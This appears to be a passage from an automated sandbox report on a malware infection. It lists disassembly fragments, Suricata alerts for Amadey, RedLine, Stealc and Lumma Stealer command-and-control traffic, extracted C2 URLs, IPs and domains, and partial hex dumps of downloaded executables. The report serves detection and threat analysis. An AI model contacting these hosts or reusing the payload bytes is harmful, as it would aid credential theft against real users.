Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [edi], al	14_2_00EE27B0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [ebx], al	14_2_00EE27B0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [edx], cl	14_2_00EE27B0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	14_2_00ECA880
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp al, 2Eh	14_2_00EDC891
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then xor eax, eax	14_2_00EDC891
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh	14_2_00EF89F0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	14_2_00EF4970
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esi]	14_2_00EC3AE6
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov ebx, ecx	14_2_00EC3AE6
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	14_2_00EC3AE6
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	14_2_00EF5AD0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [edi], al	14_2_00EE4A2F
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	14_2_00EF8BE0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	14_2_00EE0BD0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then jmp edx	14_2_00ED7B0F
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	14_2_00EDBB00
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	14_2_00ED6CA0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	14_2_00EB4C10
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov byte ptr [edi], al	14_2_00EE4DF6
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	14_2_00EF5D80
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	14_2_00EFAD90
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then add edi, 02h	14_2_00ECDD64
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [ebx]	14_2_00ECDD64
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	14_2_00EB5D20
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	14_2_00EF7EDE
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esi+1Ch]	14_2_00EBFEBC
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esp]	14_2_00EF9E60
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	14_2_00EC4E26
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then xor eax, eax	14_2_00EC4E26
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then xor eax, eax	14_2_00EBEFFC
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000120h]	14_2_00EBEFFC
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	14_2_00ECCFF0
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov word ptr [eax], cx	14_2_00ED6F20
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then mov eax, dword ptr [esp]	14_2_00EFAF10
Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	14_2_00EFAF10

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49712 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49710 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49715 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49714 -> 95.179.250.45:26212
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49719 -> 65.21.18.51:45580
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49719 -> 65.21.18.51:45580
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 65.21.18.51:45580 -> 192.168.2.5:49719
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49720 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49723 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49721 -> 185.215.113.26:80
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49714 -> 95.179.250.45:26212
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 95.179.250.45:26212 -> 192.168.2.5:49714
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 95.179.250.45:26212 -> 192.168.2.5:49714
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49722 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49722 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.17:80 -> 192.168.2.5:49722
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49722 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.17:80 -> 192.168.2.5:49722
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49722 -> 185.215.113.17:80
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 65.21.18.51:45580 -> 192.168.2.5:49719
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.26:80 -> 192.168.2.5:49721
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49728 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49731 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49738 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49743 -> 89.105.223.196:29862
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49743 -> 89.105.223.196:29862
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.105.223.196:29862 -> 192.168.2.5:49743
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49744 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49749 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49750 -> 185.215.113.67:15206
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49750 -> 185.215.113.67:15206
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.215.113.67:15206 -> 192.168.2.5:49750
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 89.105.223.196:29862 -> 192.168.2.5:49743
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49755 -> 91.202.233.158:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49757 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.215.113.67:15206 -> 192.168.2.5:49750
Source: Network traffic	Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.5:60924 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.5:49761 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.5:54804 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49763 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.5:49764 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.5:63062 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.5:49768 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49767 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.5:52855 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.5:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49753 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.5:56006 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.5:55665 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.5:49775 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.5:49777 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.5:49772 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.5:60964 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49774 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.5:49779 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.5:55686 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.5:49780 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49785 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49782
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49796 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49782 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49791 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49779 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49761 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49779 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49761 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49764 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49786 -> 104.21.2.13:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49780 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49764 -> 104.21.4.136:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49786 -> 104.21.2.13:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49775 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49780 -> 172.67.208.139:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49775 -> 172.67.162.108:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49777 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49777 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49768 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49772 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49770 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49772 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49768 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: Malware configuration extractor	URLs: lootebarrkeyn.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: 188.190.10.161
Source: Malware configuration extractor	URLs: http://91.202.233.158/e96ea2db21fa9a1b.php
Source: Malware configuration extractor	IPs: 185.215.113.16
Source: Malware configuration extractor	URLs: 95.179.250.45:26212

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.215.113.67 ports 0,1,2,5,6,15206

Yara detected Generic Downloader

Source: Yara match

File source: 36.2.rstxdhuj.exe.4141590.4.raw.unpack, type: UNPACKEDPE

Source: global traffic	TCP traffic: 192.168.2.5:49714 -> 95.179.250.45:26212
Source: global traffic	TCP traffic: 192.168.2.5:49719 -> 65.21.18.51:45580
Source: global traffic	TCP traffic: 192.168.2.5:49743 -> 89.105.223.196:29862
Source: global traffic	TCP traffic: 192.168.2.5:49750 -> 185.215.113.67:15206

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:04 GMTContent-Type: application/octet-streamContent-Length: 320000Last-Modified: Wed, 11 Sep 2024 19:08:04 GMTConnection: keep-aliveETag: "66e1ea94-4e200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 67 e5 e1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 08 00 00 00 00 00 00 5e f7 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f7 04 00 4b 00 00 00 00 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 d8 f5 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d7 04 00 00 20 00 00 00 d8 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 05 00 00 06 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f7 04 00 00 00 00 00 48 00 00 00 02 00 05 00 68 e8 04 00 70 0d 00 00 03 00 02 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 49 98 c5 eb e4 07 3d 4e 57 c4 94 0e b8 53 b5 28 8c a4 60 7d 43 e0 bd be a1 50 3f 32 96 e1 7f 68 ee 09 6c 85 3c 41 15 49 09 ba d4 fa f6 43 4e bc b8 ee c3 2f 99 75 8f 13 54 98 eb 94 d5 14 eb ae 0f 0f 40 0b 24 ba 30 ac ba 72 e4 aa c5 d3 22 5f 38 29 4c a5 93 97 73 a9 59 51 ec 11 25 fb 2f 3f dd c0 ca 4c 9f a3 37 65 26 5b d4 7a e2 92 dd eb bd c1 ae 2a 12 e3 6a 2e 9a 38 4a cb f5 ec b2 73 6e a8 3d e2 e0 4f dc a1 c9 e4 7c b2 90 d7 6e b7 f6 87 10 17 67 55 44 47 b4 ac 48 4b 1b 0e e4 87 e2 52 05 54 dc fa e9 31 4c 7a ca d5 dd 7f 0d 46 b5 7f 5e 6c ca b6 79 a8 7b 4a 80 90 42 7c 80 f8 ad 60 9f 6f 48 f3 8c 33 c5 fb 13 ac f3 56 4e d2 d8 66 94 7d 4a 06 87 f6 2f bf 3f 7f b6 89 bf dd e0 a0 b3 da b3 34 6e 45 85 53 86 a8 f1 e1 33 41 b1 d3 72 04 4d 9e 7f 71 66 e7 05 7b 8b 08 d6 a9 8b fd 21 49 55 07 c8 2f b1 4d 85 3f 3e f0 02 88 e8 08 a2 30 e7 65 94 96 58 16 66 e9 0b b0 69 09 55 69 17 02 ad cf a0 60 fc 77 be 88 66 61 b4 fe 4c 77 69 b7 56 4d a0 69 e1 34 ac d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:06 GMTContent-Type: application/octet-streamContent-Length: 903168Last-Modified: Wed, 25 Sep 2024 19:30:48 GMTConnection: keep-aliveETag: "66f464e8-dc800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b6 64 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 be 0d 00 00 08 00 00 00 00 00 00 ee dc 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 dc 0d 00 57 00 00 00 00 e0 0d 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 5c db 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 bc 0d 00 00 20 00 00 00 be 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 05 00 00 00 e0 0d 00 00 06 00 00 00 c0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 c6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 ca 0d 00 9c 10 00 00 03 00 02 00 13 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 6b ae d1 cd 28 d7 51 9d 2e cd 47 51 4c b3 ec 71 b5 82 95 83 cc 4e 71 72 d8 5c 9c 5e 76 e3 84 45 f8 df e1 e3 3c 8a 1c 40 3d ea aa d5 1c 29 21 62 e6 3d 71 51 2e ec b2 2e 42 0e 63 fc 1c 8c c6 ce 3c bf 71 b5 69 92 20 41 eb a1 b5 51 45 2c 54 ae 14 7e 66 cb 58 33 ec 89 ec 1e 81 df 7e f2 8f dd 9d 24 15 29 0a 28 38 74 07 ac a7 9b c4 e1 01 ec ed 72 e2 63 40 10 de 9e 13 69 a8 32 85 3f c4 2d 14 38 d1 fe 2d 09 84 e1 e8 c6 a0 3a 05 b1 ac 27 49 b2 60 44 f2 e6 aa d3 3f 2f 33 3f c5 1d d2 57 50 1f 27 db 02 c0 58 4c 7a 96 12 ce ef 62 12 7c 20 32 97 e1 d4 88 c4 2a 12 d6 86 ed 5c 0b 15 a6 11 1a d4 ad 8b 9d 42 19 0f a1 ed 48 67 24 33 70 df ad 7c 2b 73 fc b8 4b 8f b1 11 ee 5a cb 6d ba 60 fb f1 ce eb 77 7f 09 77 bd 69 f1 ba 56 74 06 0f 6e ef 4c 4c 0a db f7 64 0e 60 61 8e 4f 8b c8 54 c4 fc 9e ca 05 c8 c0 23 6b b5 30 44 40 64 9a fc 38 70 a4 7b 2e 3f 5a 0c d0 8e 2d c7 c8 